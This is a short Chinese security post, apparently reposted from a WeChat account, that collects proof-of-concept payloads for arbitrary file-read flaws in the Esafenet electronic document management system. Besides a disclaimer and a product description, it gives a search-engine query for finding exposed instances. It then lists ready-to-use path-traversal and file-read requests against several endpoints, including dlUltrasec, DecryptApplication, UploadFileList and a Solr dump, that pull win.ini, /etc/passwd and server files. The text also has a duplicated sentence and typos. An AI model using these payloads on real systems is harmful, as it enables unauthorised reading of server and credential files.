免责声明由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
| 0x01 产品介绍
亿赛通电子文档管理系统是一款国内较早基于文件过滤驱动技术的文档加解密产品,它以亿赛通电子文档管理系统是一款国内较早基于文件过滤驱动技术的文档加解密产品,它以驱动层透明加密技术实现电子文档的全生命周期防护,保护范围广泛,涵盖终端电脑(包括Windows、Mac、Linux系统平台)、智能终端(如Android、IOS)以及各类应用系统,如OA、知识管理、文档管理、项目管理、PDM等。
| 0x02 影响产品
亿赛通电子文档管理系统| 0x03 语法特征
app:"亿赛通电子文档安全管理系统"
| 0x04 POC
打开页面
亿赛通-dlUltrasec-文件读取漏洞
url+/linuxUpdate/dlUltrasec?path=../../../../../../../../esafenet/CdgWeb/CDGServer3/index.jsp&type=1亿赛通-DecryptApplication-文件读取漏洞
windows:url+/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/win.ini&uploadFileId=1&fileName1=ox9wcxwck7g1linux:url+/CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=/etc/passwd&uploadFileId=1&fileName1=ox9wcxwck7g1
亿赛通-UploadFileList-文件读取漏洞
windwos:POST /CDGServer3/document/UploadFileList;login HTTP/1.1command=VeiwUploadFile&filePath=/etc/passwd&fileName1=111111
linux:POST /CDGServer3/document/UploadFileList;login HTTP/1.1command=VeiwUploadFile&filePath=/etc/passwd&fileName1=111111
亿赛通-dump-文件读取漏洞
POST/solr/flow/debug/dump?param=ContentStreamsHTTP/1.1stream.url=file:///c:/windows/win.ini
原文始发于微信公众号(WK安全):【漏洞复现】亿赛通电子文档管理系统文件泄露集合
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论